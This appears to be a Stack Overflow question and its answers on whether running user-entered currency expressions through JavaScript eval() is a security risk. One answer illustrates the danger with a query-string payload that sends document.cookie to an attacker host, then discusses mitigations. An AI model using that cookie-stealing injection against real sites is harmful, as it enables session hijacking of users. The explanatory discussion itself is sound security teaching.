This question already has answers here:
Closed 7 years ago.
Possible Duplicate:
When is JavaScript’s eval() not evil?
I am writing a script in which users have to write in a currency amount, some examples could be (user input >> converts to), with USD as default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
I want to make this as smooth as possible, therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval()
and return it.
Is this a bad idea? I've read some topics about eval()
being a security issue. I just don't see how. A user can easily run JavaScript anyway?
Keep in mind that I will validate all input server-side with PHP at a later stage.
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval
for his own ends.
The reason eval
is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you specify input via query string, where the input box is prepopulated with the value in the query string.
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(Obviously proper URL encoding is required; this is for illustration.)
Or, perhaps your PHP script echos posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
Each of these attacks can be mitigated by using httpOnly
cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
Even given the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, eval
ing it may expose you to a vulnerability.
See also:
- JavaScript to evaluate simple math string like 5*1.2 (eval/white-list?)
- JavaScript written only with brackets?
If you need it, use it.
Here's a good link, which discusses both security ... as well as other common objections to "eval()":
- http://javascriptweblog.wordpress.com/2010/04/19/how-evil-is-eval/
What about security? If its your software that’s supplying eval with
its argument then there’s very little to fear on this front. Sure, it
would be unwise to eval the value of an input box, but running eval
over a response generated by your own server code should present no
special risk. Also bear in mind there is no damage a would-be-attacker
could do with client side eval that they couldn’t more easily achieve
with a modern browser console.
IMHO ...